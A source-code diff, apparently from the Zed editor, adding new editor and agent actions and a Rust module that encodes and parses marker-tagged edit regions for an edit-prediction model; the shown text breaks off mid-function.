- if matches!(KEY_VALUE_STORE.read_kvp(FIRST_OPEN), Ok(None)) {
+ let kvp = cx.update(|cx| KeyValueStore::global(cx));
+ if matches!(kvp.read_kvp(FIRST_OPEN), Ok(None)) {
cx.update(|cx| show_onboarding_view(app_state, cx).detach());
}
// If not the first launch, show an empty window with empty editor
@@ -110,6 +110,12 @@ pub struct Extensions {
#[serde(deny_unknown_fields)]
pub struct AcpRegistry;
+/// Show call diagnostics and connection quality statistics.
+#[derive(PartialEq, Clone, Default, Debug, Deserialize, JsonSchema, Action)]
+#[action(namespace = collab)]
+#[serde(deny_unknown_fields)]
+pub struct ShowCallStats;
+
/// Decreases the font size in the editor buffer.
#[derive(PartialEq, Clone, Default, Debug, Deserialize, JsonSchema, Action)]
#[action(namespace = zed)]
@@ -191,6 +197,8 @@ pub mod editor {
MoveUp,
/// Moves cursor down.
MoveDown,
+ /// Reveals the current file in the system file manager.
+ RevealInFileManager,
]
);
}
@@ -325,6 +333,12 @@ pub mod feedback {
);
}
+pub mod theme {
+ use gpui::actions;
+
+ actions!(theme, [ToggleMode]);
+}
+
pub mod theme_selector {
use gpui::Action;
use schemars::JsonSchema;
@@ -469,6 +483,33 @@ pub mod agent {
/// The base ref that the diff was computed against (e.g. "main").
pub base_ref: SharedString,
}
+
+ /// A single merge conflict region extracted from a file.
+ #[derive(Clone, Debug, PartialEq, Deserialize, JsonSchema)]
+ pub struct ConflictContent {
+ pub file_path: String,
+ pub conflict_text: String,
+ pub ours_branch_name: String,
+ pub theirs_branch_name: String,
+ }
+
+ /// Opens a new agent thread to resolve specific merge conflicts.
+ #[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)]
+ #[action(namespace = agent)]
+ #[serde(deny_unknown_fields)]
+ pub struct ResolveConflictsWithAgent {
+ /// Individual conflicts with their full text.
+ pub conflicts: Vec<ConflictContent>,
+ }
+
+ /// Opens a new agent thread to resolve merge conflicts in the given file paths.
+ #[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)]
+ #[action(namespace = agent)]
+ #[serde(deny_unknown_fields)]
+ pub struct ResolveConflictedFilesWithAgent {
+ /// File paths with unresolved conflicts (for project-wide resolution).
+ pub conflicted_file_paths: Vec<String>,
+ }
}
pub mod assistant {
@@ -737,6 +778,20 @@ pub mod preview {
}
}
+pub mod agents_sidebar {
+ use gpui::actions;
+
+ actions!(
+ agents_sidebar,
+ [
+ /// Moves focus to the sidebar's search/filter editor.
+ FocusSidebarFilter,
+ /// Moves the active workspace to a new window.
+ MoveWorkspaceToNewWindow,
+ ]
+ );
+}
+
pub mod notebook {
use gpui::actions;
@@ -0,0 +1,1691 @@
+use anyhow::{Context as _, Result, anyhow};
+
+pub const MARKER_TAG_PREFIX: &str = "<|marker_";
+pub const MARKER_TAG_SUFFIX: &str = "|>";
+pub const RELATIVE_MARKER_TAG_PREFIX: &str = "<|marker";
+const V0316_MIN_BLOCK_LINES: usize = 3;
+const V0316_MAX_BLOCK_LINES: usize = 8;
+const V0318_MIN_BLOCK_LINES: usize = 6;
+const V0318_MAX_BLOCK_LINES: usize = 16;
+const MAX_NUDGE_LINES: usize = 5;
+pub const V0316_END_MARKER: &str = "<[end▁of▁sentence]>";
+pub const V0317_END_MARKER: &str = "<[end▁of▁sentence]>";
+pub const V0318_END_MARKER: &str = "<[end▁of▁sentence]>";
+
+pub fn marker_tag(number: usize) -> String {
+ format!("{MARKER_TAG_PREFIX}{number}{MARKER_TAG_SUFFIX}")
+}
+
+pub fn marker_tag_relative(delta: isize) -> String {
+ if delta > 0 {
+ format!("<|marker+{delta}|>")
+ } else if delta == 0 {
+ String::from("<|marker-0|>")
+ } else {
+ format!("<|marker{delta}|>")
+ }
+}
+
+struct LineInfo {
+ start: usize,
+ is_blank: bool,
+ is_good_start: bool,
+}
+
+fn collect_line_info(text: &str) -> Vec<LineInfo> {
+ let mut lines = Vec::new();
+ let mut offset = 0;
+ for line in text.split('\n') {
+ let trimmed = line.trim();
+ let is_blank = trimmed.is_empty();
+ let is_good_start = !is_blank && !is_structural_tail(trimmed);
+ lines.push(LineInfo {
+ start: offset,
+ is_blank,
+ is_good_start,
+ });
+ offset += line.len() + 1;
+ }
+ // split('\n') on "abc\n" yields ["abc", ""] — drop the phantom trailing
+ // empty element when the text ends with '\n'.
+ if text.ends_with('\n') && lines.len() > 1 {
+ lines.pop();
+ }
+ lines
+}
+
+fn is_structural_tail(trimmed_line: &str) -> bool {
+ if trimmed_line.starts_with(&['}', ']', ')']) {
+ return true;
+ }
+ matches!(
+ trimmed_line.trim_end_matches(';'),
+ "break" | "continue" | "return" | "throw" | "end"
+ )
+}
+
+/// Starting from line `from`, scan up to `MAX_NUDGE_LINES` forward to find a
+/// line with `is_good_start`. Returns `None` if no suitable line is found.
+fn skip_to_good_start(lines: &[LineInfo], from: usize) -> Option<usize> {
+ (from..lines.len().min(from + MAX_NUDGE_LINES)).find(|&i| lines[i].is_good_start)
+}
+
+/// Compute byte offsets within `editable_text` where marker boundaries should
+/// be placed.
+///
+/// Returns a sorted `Vec<usize>` that always starts with `0` and ends with
+/// `editable_text.len()`. Interior offsets are placed at line boundaries
+/// (right after a `\n`), preferring blank-line boundaries when available and
+/// respecting `min_block_lines` / `max_block_lines` constraints.
+fn compute_marker_offsets_with_limits(
+ editable_text: &str,
+ min_block_lines: usize,
+ max_block_lines: usize,
+) -> Vec<usize> {
+ if editable_text.is_empty() {
+ return vec![0, 0];
+ }
+
+ let lines = collect_line_info(editable_text);
+ let mut offsets = vec![0usize];
+ let mut last_boundary_line = 0;
+ let mut i = 0;
+
+ while i < lines.len() {
+ let gap = i - last_boundary_line;
+
+ // Blank-line split: non-blank line following blank line(s) with enough
+ // accumulated lines.
+ if gap >= min_block_lines && !lines[i].is_blank && i > 0 && lines[i - 1].is_blank {
+ let target = if lines[i].is_good_start {
+ i
+ } else {
+ skip_to_good_start(&lines, i).unwrap_or(i)
+ };
+ if lines.len() - target >= min_block_lines
+ && lines[target].start > *offsets.last().unwrap_or(&0)
+ {
+ offsets.push(lines[target].start);
+ last_boundary_line = target;
+ i = target + 1;
+ continue;
+ }
+ }
+
+ // Hard cap: too many lines without a split.
+ if gap >= max_block_lines {
+ let target = skip_to_good_start(&lines, i).unwrap_or(i);
+ if lines[target].start > *offsets.last().unwrap_or(&0) {
+ offsets.push(lines[target].start);
+ last_boundary_line = target;
+ i = target + 1;
+ continue;
+ }
+ }
+
+ i += 1;
+ }
+
+ let end = editable_text.len();
+ if *offsets.last().unwrap_or(&0) != end {
+ offsets.push(end);
+ }
+
+ offsets
+}
+
+/// Compute byte offsets within `editable_text` for the V0316/V0317 block sizing rules.
+pub fn compute_marker_offsets(editable_text: &str) -> Vec<usize> {
+ compute_marker_offsets_with_limits(editable_text, V0316_MIN_BLOCK_LINES, V0316_MAX_BLOCK_LINES)
+}
+
+pub fn compute_marker_offsets_v0318(editable_text: &str) -> Vec<usize> {
+ compute_marker_offsets_with_limits(editable_text, V0318_MIN_BLOCK_LINES, V0318_MAX_BLOCK_LINES)
+}
+
+/// Write the editable region content with marker tags, inserting the cursor
+/// marker at the given offset within the editable text.
+pub fn write_editable_with_markers(
+ output: &mut String,
+ editable_text: &str,
+ cursor_offset_in_editable: usize,
+ cursor_marker: &str,
+) {
+ let marker_offsets = compute_marker_offsets(editable_text);
+ let mut cursor_placed = false;
+ for (i, &offset) in marker_offsets.iter().enumerate() {
+ let marker_num = i + 1;
+ if !output.is_empty() && !output.ends_with('\n') {
+ output.push('\n');
+ }
+ output.push_str(&marker_tag(marker_num));
+
+ if let Some(&next_offset) = marker_offsets.get(i + 1) {
+ output.push('\n');
+ let block = &editable_text[offset..next_offset];
+ if !cursor_placed
+ && cursor_offset_in_editable >= offset
+ && cursor_offset_in_editable <= next_offset
+ {
+ cursor_placed = true;
+ let cursor_in_block = cursor_offset_in_editable - offset;
+ output.push_str(&block[..cursor_in_block]);
+ output.push_str(cursor_marker);
+ output.push_str(&block[cursor_in_block..]);
+ } else {
+ output.push_str(block);
+ }
+ }
+ }
+}
+
+/// Strip any `<|marker_N|>` tags from `text`.
+///
+/// When a marker tag sits on its own line (followed by `\n`), the trailing
+/// newline is also removed so the surrounding lines stay joined naturally.
+fn strip_marker_tags(text: &str) -> String {
+ let mut result = String::with_capacity(text.len());
+ let mut pos = 0;
+ let bytes = text.as_bytes();
+ while let Some(rel) = text[pos..].find(MARKER_TAG_PREFIX) {
+ result.push_str(&text[pos..pos + rel]);
+ let num_start = pos + rel + MARKER_TAG_PREFIX.len();
+ if let Some(suffix_rel) = text[num_start..].find(MARKER_TAG_SUFFIX) {
+ let mut tag_end = num_start + suffix_rel + MARKER_TAG_SUFFIX.len();
+ if bytes.get(tag_end) == Some(&b'\n') {
+ tag_end += 1;
+ }
+ pos = tag_end;
+ } else {
+ result.push_str(MARKER_TAG_PREFIX);
+ pos = num_start;
+ }
+ }
+ result.push_str(&text[pos..]);
+ result
+}
+
+/// Parse model output that uses the marker format.
+///
+/// Returns `(start_marker_num, end_marker_num, content_between_markers)`.
+/// The leading format-level newline after the start marker is stripped.
+/// Trailing newlines are preserved so blank-line endings in the editable
+/// region are not lost.
+///
+/// Any extra intermediate marker tags that the model may have inserted
+/// between the first and last markers are stripped from the returned content.
+pub fn extract_marker_span(text: &str) -> Result<(usize, usize, String)> {
+ let first_tag_start = text
+ .find(MARKER_TAG_PREFIX)
+ .context("no start marker found in output")?;
+ let first_num_start = first_tag_start + MARKER_TAG_PREFIX.len();
+ let first_num_end = text[first_num_start..]
+ .find(MARKER_TAG_SUFFIX)
+ .map(|i| i + first_num_start)
+ .context("malformed start marker tag")?;
+ let start_num: usize = text[first_num_start..first_num_end]
+ .parse()
+ .context("start marker number is not a valid integer")?;
+ let first_tag_end = first_num_end + MARKER_TAG_SUFFIX.len();
+
+ let last_tag_start = text
+ .rfind(MARKER_TAG_PREFIX)
+ .context("no end marker found in output")?;
+ let last_num_start = last_tag_start + MARKER_TAG_PREFIX.len();
+ let last_num_end = text[last_num_start..]
+ .find(MARKER_TAG_SUFFIX)
+ .map(|i| i + last_num_start)
+ .context("malformed end marker tag")?;
+ let end_num: usize = text[last_num_start..last_num_end]
+ .parse()
+ .context("end marker number is not a valid integer")?;
+
+ if start_num == end_num {
+ return Err(anyhow!(
+ "start and end markers are the same (marker {})",
+ start_num
+ ));
+ }
+
+ let mut content_start = first_tag_end;
+ if text.as_bytes().get(content_start) == Some(&b'\n') {
+ content_start += 1;
+ }
+ let content_end = last_tag_start;
+
+ let content = &text[content_start..content_end.max(content_start)];
+ let content = strip_marker_tags(content);
+ Ok((start_num, end_num, content))
+}
+
+/// Given old editable text and model output with marker span, reconstruct the
+/// full new editable region.
+pub fn apply_marker_span(old_editable: &str, output: &str) -> Result<String> {
+ let (start_num, end_num, raw_new_span) = extract_marker_span(output)?;
+ let marker_offsets = compute_marker_offsets(old_editable);
+
+ let start_idx = start_num
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let end_idx = end_num
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let start_byte = *marker_offsets
+ .get(start_idx)
+ .context("start marker number out of range")?;
+ let end_byte = *marker_offsets
+ .get(end_idx)
+ .context("end marker number out of range")?;
+
+ if start_byte > end_byte {
+ return Err(anyhow!("start marker must come before end marker"));
+ }
+
+ let old_span = &old_editable[start_byte..end_byte];
+ let mut new_span = raw_new_span;
+ if old_span.ends_with('\n') && !new_span.ends_with('\n') && !new_span.is_empty() {
+ new_span.push('\n');
+ }
+ if !old_span.ends_with('\n') && new_span.ends_with('\n') {
+ new_span.pop();
+ }
+
+ let mut result = String::new();
+ result.push_str(&old_editable[..start_byte]);
+ result.push_str(&new_span);
+ result.push_str(&old_editable[end_byte..]);
+
+ Ok(result)
+}
+
+/// Compare old and new editable text, find the minimal marker span that covers
+/// all changes, and encode the result with marker tags.
+pub fn encode_from_old_and_new(
+ old_editable: &str,
+ new_editable: &str,
+ cursor_offset_in_new: Option<usize>,
+ cursor_marker: &str,
+ end_marker: &str,
+ no_edits_marker: &str,
+) -> Result<String> {
+ if old_editable == new_editable {
+ return Ok(format!("{no_edits_marker}{end_marker}"));
+ }
+
+ let marker_offsets = compute_marker_offsets(old_editable);
+ let (common_prefix, common_suffix) =
+ common_prefix_suffix(old_editable.as_bytes(), new_editable.as_bytes());
+ let change_end_in_old = old_editable.len() - common_suffix;
+
+ let start_marker_idx = marker_offsets
+ .iter()
+ .rposition(|&offset| offset <= common_prefix)
+ .unwrap_or(0);
+ let end_marker_idx = marker_offsets
+ .iter()
+ .position(|&offset| offset >= change_end_in_old)
+ .unwrap_or(marker_offsets.len() - 1);
+
+ let old_start = marker_offsets[start_marker_idx];
+ let old_end = marker_offsets[end_marker_idx];
+
+ let new_start = old_start;
+ let new_end = new_editable
+ .len()
+ .saturating_sub(old_editable.len().saturating_sub(old_end));
+
+ let new_span = &new_editable[new_start..new_end];
+
+ let start_marker_num = start_marker_idx + 1;
+ let end_marker_num = end_marker_idx + 1;
+
+ let mut result = String::new();
+ result.push_str(&marker_tag(start_marker_num));
+ result.push('\n');
+
+ if let Some(cursor_offset) = cursor_offset_in_new {
+ if cursor_offset >= new_start && cursor_offset <= new_end {
+ let cursor_in_span = cursor_offset - new_start;
+ let bounded = cursor_in_span.min(new_span.len());
+ result.push_str(&new_span[..bounded]);
+ result.push_str(cursor_marker);
+ result.push_str(&new_span[bounded..]);
+ } else {
+ result.push_str(new_span);
+ }
+ } else {
+ result.push_str(new_span);
+ }
+
+ if !result.ends_with('\n') {
+ result.push('\n');
+ }
+ result.push_str(&marker_tag(end_marker_num));
+ result.push('\n');
+ result.push_str(end_marker);
+
+ Ok(result)
+}
+
+/// Extract the full editable region from text that uses marker tags.
+///
+/// Returns the concatenation of all block contents between the first and last
+/// markers, with intermediate marker tags stripped.
+pub fn extract_editable_region_from_markers(text: &str) -> Option<String> {
+ let first_marker_start = text.find(MARKER_TAG_PREFIX)?;
+
+ let mut markers: Vec<(usize, usize)> = Vec::new();
+ let mut search_start = first_marker_start;
+ while let Some(rel_pos) = text[search_start..].find(MARKER_TAG_PREFIX) {
+ let tag_start = search_start + rel_pos;
+ let num_start = tag_start + MARKER_TAG_PREFIX.len();
+ let num_end = text[num_start..].find(MARKER_TAG_SUFFIX)?;
+ let tag_end = num_start + num_end + MARKER_TAG_SUFFIX.len();
+ markers.push((tag_start, tag_end));
+ search_start = tag_end;
+ }
+
+ if markers.len() < 2 {
+ return None;
+ }
+
+ let (_, first_tag_end) = markers[0];
+ let (last_tag_start, _) = markers[markers.len() - 1];
+
+ let mut content_start = first_tag_end;
+ if text.as_bytes().get(content_start) == Some(&b'\n') {
+ content_start += 1;
+ }
+ let mut content_end = last_tag_start;
+ if content_end > content_start && text.as_bytes().get(content_end - 1) == Some(&b'\n') {
+ content_end -= 1;
+ }
+
+ let raw = &text[content_start..content_end];
+ let result = strip_marker_tags(raw);
+ let result = result.strip_suffix('\n').unwrap_or(&result).to_string();
+ Some(result)
+}
+
+struct ParsedTag {
+ value: isize,
+ tag_start: usize,
+ tag_end: usize,
+}
+
+fn collect_tags(text: &str, prefix: &str, parse: fn(&str) -> Option<isize>) -> Vec<ParsedTag> {
+ let mut tags = Vec::new();
+ let mut search_from = 0;
+ while let Some(rel_pos) = text[search_from..].find(prefix) {
+ let tag_start = search_from + rel_pos;
+ let payload_start = tag_start + prefix.len();
+ if let Some(suffix_rel) = text[payload_start..].find(MARKER_TAG_SUFFIX) {
+ let payload_end = payload_start + suffix_rel;
+ if let Some(value) = parse(&text[payload_start..payload_end]) {
+ let tag_end = payload_end + MARKER_TAG_SUFFIX.len();
+ tags.push(ParsedTag {
+ value,
+ tag_start,
+ tag_end,
+ });
+ search_from = tag_end;
+ continue;
+ }
+ }
+ search_from = tag_start + prefix.len();
+ }
+ tags
+}
+
+fn collect_marker_tags(text: &str) -> Vec<ParsedTag> {
+ collect_tags(text, MARKER_TAG_PREFIX, |s| {
+ s.parse::<usize>().ok().map(|n| n as isize)
+ })
+}
+
+fn collect_relative_marker_tags(text: &str) -> Vec<ParsedTag> {
+ collect_tags(text, RELATIVE_MARKER_TAG_PREFIX, |s| {
+ s.parse::<isize>().ok()
+ })
+}
+
+pub fn nearest_marker_number(cursor_offset: Option<usize>, marker_offsets: &[usize]) -> usize {
+ let cursor = cursor_offset.unwrap_or(0);
+ marker_offsets
+ .iter()
+ .enumerate()
+ .min_by_key(|(_, offset)| (**offset as isize - cursor as isize).unsigned_abs())
+ .map(|(idx, _)| idx + 1)
+ .unwrap_or(1)
+}
+
+fn cursor_block_index(cursor_offset: Option<usize>, marker_offsets: &[usize]) -> usize {
+ let cursor = cursor_offset.unwrap_or(0);
+ marker_offsets
+ .windows(2)
+ .position(|window| cursor >= window[0] && cursor < window[1])
+ .unwrap_or_else(|| marker_offsets.len().saturating_sub(2))
+}
+
+fn common_prefix_suffix(a: &[u8], b: &[u8]) -> (usize, usize) {
+ let prefix = a.iter().zip(b.iter()).take_while(|(x, y)| x == y).count();
+ let remaining_a = a.len() - prefix;
+ let remaining_b = b.len() - prefix;
+ let max_suffix = remaining_a.min(remaining_b);
+ let suffix = a[a.len() - max_suffix..]
+ .iter()
+ .rev()
+ .zip(b[b.len() - max_suffix..].iter().rev())
+ .take_while(|(x, y)| x == y)
+ .count();
+ (prefix, suffix)
+}
+
+/// Map a byte offset from old span coordinates to new span coordinates,
+/// using common prefix/suffix within the span for accuracy.
+fn map_boundary_offset(
+ old_rel: usize,
+ old_span_len: usize,
+ new_span_len: usize,
+ span_common_prefix: usize,
+ span_common_suffix: usize,
+) -> usize {
+ if old_rel <= span_common_prefix {
+ old_rel
+ } else if old_rel >= old_span_len - span_common_suffix {
+ new_span_len - (old_span_len - old_rel)
+ } else {
+ let old_changed_start = span_common_prefix;
+ let old_changed_len = old_span_len
+ .saturating_sub(span_common_prefix)
+ .saturating_sub(span_common_suffix);
+ let new_changed_start = span_common_prefix;
+ let new_changed_len = new_span_len
+ .saturating_sub(span_common_prefix)
+ .saturating_sub(span_common_suffix);
+
+ if old_changed_len == 0 {
+ new_changed_start
+ } else {
+ new_changed_start + ((old_rel - old_changed_start) * new_changed_len / old_changed_len)
+ }
+ }
+}
+
+fn snap_to_line_start(text: &str, offset: usize) -> usize {
+ let bounded = offset.min(text.len());
+ let bounded = text.floor_char_boundary(bounded);
+
+ if bounded >= text.len() {
+ return text.len();
+ }
+
+ if bounded == 0 || text.as_bytes().get(bounded - 1) == Some(&b'\n') {
+ return bounded;
+ }
+
+ if let Some(next_nl_rel) = text[bounded..].find('\n') {
+ let next = bounded + next_nl_rel + 1;
+ return text.floor_char_boundary(next.min(text.len()));
+ }
+
+ let prev_start = text[..bounded].rfind('\n').map(|idx| idx + 1).unwrap_or(0);
+ text.floor_char_boundary(prev_start)
+}
+
+/// Write the editable region content with byte-exact marker tags, inserting the
+/// cursor marker at the given offset within the editable text.
+///
+/// The `tag_for_index` closure maps a boundary index to the marker tag string.
+fn write_editable_with_markers_impl(
+ output: &mut String,
+ editable_text: &str,
+ cursor_offset_in_editable: usize,
+ cursor_marker: &str,
+ marker_offsets: &[usize],
+ tag_for_index: impl Fn(usize) -> String,
+) {
+ let mut cursor_placed = false;
+ for (i, &offset) in marker_offsets.iter().enumerate() {
+ output.push_str(&tag_for_index(i));
+
+ if let Some(&next_offset) = marker_offsets.get(i + 1) {
+ let block = &editable_text[offset..next_offset];
+ if !cursor_placed
+ && cursor_offset_in_editable >= offset
+ && cursor_offset_in_editable <= next_offset
+ {
+ cursor_placed = true;
+ let cursor_in_block = cursor_offset_in_editable - offset;
+ output.push_str(&block[..cursor_in_block]);
+ output.push_str(cursor_marker);
+ output.push_str(&block[cursor_in_block..]);
+ } else {
+ output.push_str(block);
+ }
+ }
+ }
+}
+
+pub fn write_editable_with_markers_v0316(
+ output: &mut String,
+ editable_text: &str,
+ cursor_offset_in_editable: usize,
+ cursor_marker: &str,
+) {
+ let marker_offsets = compute_marker_offsets(editable_text);
+ write_editable_with_markers_impl(
+ output,
+ editable_text,
+ cursor_offset_in_editable,
+ cursor_marker,
+ &marker_offsets,
+ |i| marker_tag(i + 1),
+ );
+}
+
+pub fn write_editable_with_markers_v0317(
+ output: &mut String,
+ editable_text: &str,
+ cursor_offset_in_editable: usize,
+ cursor_marker: &str,
+) {
+ let marker_offsets = compute_marker_offsets(editable_text);
+ let anchor_idx = cursor_block_index(Some(cursor_offset_in_editable), &marker_offsets);
+ write_editable_with_markers_impl(
+ output,
+ editable_text,
+ cursor_offset_in_editable,
+ cursor_marker,
+ &marker_offsets,
+ |i| marker_tag_relative(i as isize - anchor_idx as isize),
+ );
+}
+
+pub fn write_editable_with_markers_v0318(
+ output: &mut String,
+ editable_text: &str,
+ cursor_offset_in_editable: usize,
+ cursor_marker: &str,
+) {
+ let marker_offsets = compute_marker_offsets_v0318(editable_text);
+ write_editable_with_markers_impl(
+ output,
+ editable_text,
+ cursor_offset_in_editable,
+ cursor_marker,
+ &marker_offsets,
+ |i| marker_tag(i + 1),
+ );
+}
+
/// Parse byte-exact model output and reconstruct the full new editable region.
///
/// `tags` are the marker tags found in `output`, in order of appearance; the
/// first and last tag delimit the span of `old_editable` being replaced.
/// `resolve_boundaries` maps that (start, end) pair of tag values to absolute
/// byte offsets in `old_editable` (absolute numbering for V0316/V0318,
/// cursor-relative for V0317). Returns the reconstructed editable text, or an
/// error when fewer than two tags are present or the span is invalid.
fn apply_marker_span_impl(
    old_editable: &str,
    tags: &[ParsedTag],
    output: &str,
    resolve_boundaries: impl Fn(isize, isize) -> Result<(usize, usize)>,
) -> Result<String> {
    if tags.is_empty() {
        return Err(anyhow!("no marker tags found in output"));
    }
    if tags.len() == 1 {
        return Err(anyhow!(
            "only one marker tag found in output, expected at least two"
        ));
    }

    let start_value = tags[0].value;
    let end_value = tags[tags.len() - 1].value;

    // A repeated marker (same value at both ends) is the "no edit" sentinel;
    // any content between the two tags is deliberately ignored.
    if start_value == end_value {
        return Ok(old_editable.to_string());
    }

    let (start_byte, end_byte) = resolve_boundaries(start_value, end_value)?;

    if start_byte > end_byte {
        return Err(anyhow!("start marker must come before end marker"));
    }

    // The replacement text is everything between consecutive tags:
    // intermediate tags are stripped and their surrounding content joined.
    let mut new_content = String::new();
    for i in 0..tags.len() - 1 {
        let content_start = tags[i].tag_end;
        let content_end = tags[i + 1].tag_start;
        if content_start <= content_end {
            new_content.push_str(&output[content_start..content_end]);
        }
    }

    // Splice: unchanged prefix + model-provided content + unchanged suffix.
    let mut result = String::new();
    result.push_str(&old_editable[..start_byte]);
    result.push_str(&new_content);
    result.push_str(&old_editable[end_byte..]);

    Ok(result)
}
+
+pub fn apply_marker_span_v0316(old_editable: &str, output: &str) -> Result<String> {
+ let tags = collect_marker_tags(output);
+
+ // Validate monotonically increasing with no gaps (best-effort warning)
+ if tags.len() >= 2 {
+ let start_num = tags[0].value;
+ let end_num = tags[tags.len() - 1].value;
+ if start_num != end_num {
+ let expected: Vec<isize> = (start_num..=end_num).collect();
+ let actual: Vec<isize> = tags.iter().map(|t| t.value).collect();
+ if actual != expected {
+ eprintln!(
+ "V0316 marker sequence validation failed: expected {:?}, got {:?}. Attempting best-effort parse.",
+ expected, actual
+ );
+ }
+ }
+ }
+
+ let marker_offsets = compute_marker_offsets(old_editable);
+ apply_marker_span_impl(old_editable, &tags, output, |start_val, end_val| {
+ let start_idx = (start_val as usize)
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let end_idx = (end_val as usize)
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let start_byte = *marker_offsets
+ .get(start_idx)
+ .context("start marker number out of range")?;
+ let end_byte = *marker_offsets
+ .get(end_idx)
+ .context("end marker number out of range")?;
+ Ok((start_byte, end_byte))
+ })
+}
+
+pub fn apply_marker_span_v0317(
+ old_editable: &str,
+ output: &str,
+ cursor_offset_in_old: Option<usize>,
+) -> Result<String> {
+ let tags = collect_relative_marker_tags(output);
+ let marker_offsets = compute_marker_offsets(old_editable);
+ let anchor_idx = cursor_block_index(cursor_offset_in_old, &marker_offsets);
+
+ apply_marker_span_impl(old_editable, &tags, output, |start_delta, end_delta| {
+ let start_idx_signed = anchor_idx as isize + start_delta;
+ let end_idx_signed = anchor_idx as isize + end_delta;
+ if start_idx_signed < 0 || end_idx_signed < 0 {
+ return Err(anyhow!("relative marker maps before first marker"));
+ }
+ let start_idx = usize::try_from(start_idx_signed).context("invalid start marker index")?;
+ let end_idx = usize::try_from(end_idx_signed).context("invalid end marker index")?;
+ let start_byte = *marker_offsets
+ .get(start_idx)
+ .context("start marker number out of range")?;
+ let end_byte = *marker_offsets
+ .get(end_idx)
+ .context("end marker number out of range")?;
+ Ok((start_byte, end_byte))
+ })
+}
+
+pub fn apply_marker_span_v0318(old_editable: &str, output: &str) -> Result<String> {
+ let tags = collect_marker_tags(output);
+
+ if tags.len() >= 2 {
+ let start_num = tags[0].value;
+ let end_num = tags[tags.len() - 1].value;
+ if start_num != end_num {
+ let expected: Vec<isize> = (start_num..=end_num).collect();
+ let actual: Vec<isize> = tags.iter().map(|t| t.value).collect();
+ if actual != expected {
+ eprintln!(
+ "V0318 marker sequence validation failed: expected {:?}, got {:?}. Attempting best-effort parse.",
+ expected, actual
+ );
+ }
+ }
+ }
+
+ let marker_offsets = compute_marker_offsets_v0318(old_editable);
+ apply_marker_span_impl(old_editable, &tags, output, |start_val, end_val| {
+ let start_idx = (start_val as usize)
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let end_idx = (end_val as usize)
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let start_byte = *marker_offsets
+ .get(start_idx)
+ .context("start marker number out of range")?;
+ let end_byte = *marker_offsets
+ .get(end_idx)
+ .context("end marker number out of range")?;
+ Ok((start_byte, end_byte))
+ })
+}
+
/// Encode the training target from old and new editable text.
///
/// Shared implementation for V0316, V0317, and V0318. The `tag_for_block_idx`
/// closure maps a block index to the appropriate marker tag string.
/// `no_edit_tag` is the marker tag to repeat when there are no edits.
fn encode_from_old_and_new_impl(
    old_editable: &str,
    new_editable: &str,
    cursor_offset_in_new: Option<usize>,
    cursor_marker: &str,
    end_marker: &str,
    no_edit_tag: &str,
    marker_offsets: &[usize],
    tag_for_block_idx: impl Fn(usize) -> String,
) -> Result<String> {
    // No change: emit the repeated-tag sentinel that
    // `apply_marker_span_impl` recognizes as "no edit".
    if old_editable == new_editable {
        return Ok(format!("{no_edit_tag}{no_edit_tag}{end_marker}"));
    }

    // Locate the changed region of old_editable via byte-wise common
    // prefix/suffix against new_editable.
    let (common_prefix, common_suffix) =
        common_prefix_suffix(old_editable.as_bytes(), new_editable.as_bytes());
    let change_end_in_old = old_editable.len() - common_suffix;

    // Expand the change to whole marker blocks: the last boundary at or
    // before the change start, and the first boundary at or after its end.
    let mut start_marker_idx = marker_offsets
        .iter()
        .rposition(|&offset| offset <= common_prefix)
        .unwrap_or(0);
    let mut end_marker_idx = marker_offsets
        .iter()
        .position(|&offset| offset >= change_end_in_old)
        .unwrap_or(marker_offsets.len() - 1);

    // Degenerate span (change sits exactly on a single boundary): widen by
    // one block so start != end — a repeated tag would read as "no edit".
    if start_marker_idx == end_marker_idx {
        if end_marker_idx < marker_offsets.len().saturating_sub(1) {
            end_marker_idx += 1;
        } else if start_marker_idx > 0 {
            start_marker_idx -= 1;
        }
    }

    let old_start = marker_offsets[start_marker_idx];
    let old_end = marker_offsets[end_marker_idx];

    // The span start is shared (it lies in the common prefix); the span end
    // is mapped into new_editable by preserving the unchanged tail length.
    let new_start = old_start;
    let new_end = new_editable
        .len()
        .saturating_sub(old_editable.len().saturating_sub(old_end));

    let new_span = &new_editable[new_start..new_end];
    let old_span = &old_editable[old_start..old_end];

    let (span_common_prefix, span_common_suffix) =
        common_prefix_suffix(old_span.as_bytes(), new_span.as_bytes());

    let mut result = String::new();
    let mut prev_new_rel = 0usize;
    // The cursor marker is inserted at most once across all blocks.
    let mut cursor_placed = false;

    for block_idx in start_marker_idx..end_marker_idx {
        result.push_str(&tag_for_block_idx(block_idx));

        // End of this block within new_span: the final block runs to the
        // span end; interior boundaries are projected from the old span via
        // `map_boundary_offset` and then snapped to a line start —
        // presumably so emitted markers stay on line boundaries (see
        // test_encode_v0317_markers_stay_on_line_boundaries); confirm against
        // those helpers' definitions.
        let new_rel_end = if block_idx + 1 == end_marker_idx {
            new_span.len()
        } else {
            let old_rel = marker_offsets[block_idx + 1] - old_start;
            let mapped = map_boundary_offset(
                old_rel,
                old_span.len(),
                new_span.len(),
                span_common_prefix,
                span_common_suffix,
            );
            snap_to_line_start(new_span, mapped)
        };

        // Projected boundaries may land before the previous one; clamp so
        // the slice below stays valid and blocks never overlap.
        let new_rel_end = new_rel_end.max(prev_new_rel);
        let block_content = &new_span[prev_new_rel..new_rel_end];

        if !cursor_placed {
            if let Some(cursor_offset) = cursor_offset_in_new {
                let abs_start = new_start + prev_new_rel;
                let abs_end = new_start + new_rel_end;
                if cursor_offset >= abs_start && cursor_offset <= abs_end {
                    cursor_placed = true;
                    let cursor_in_block = cursor_offset - abs_start;
                    // Clamp: the cursor may sit past this block's content.
                    let bounded = cursor_in_block.min(block_content.len());
                    result.push_str(&block_content[..bounded]);
                    result.push_str(cursor_marker);
                    result.push_str(&block_content[bounded..]);
                    prev_new_rel = new_rel_end;
                    continue;
                }
            }
        }

        result.push_str(block_content);
        prev_new_rel = new_rel_end;
    }

    // Closing tag of the edited span, then the end-of-output marker.
    result.push_str(&tag_for_block_idx(end_marker_idx));
    result.push_str(end_marker);

    Ok(result)
}
+
+pub fn encode_from_old_and_new_v0316(
+ old_editable: &str,
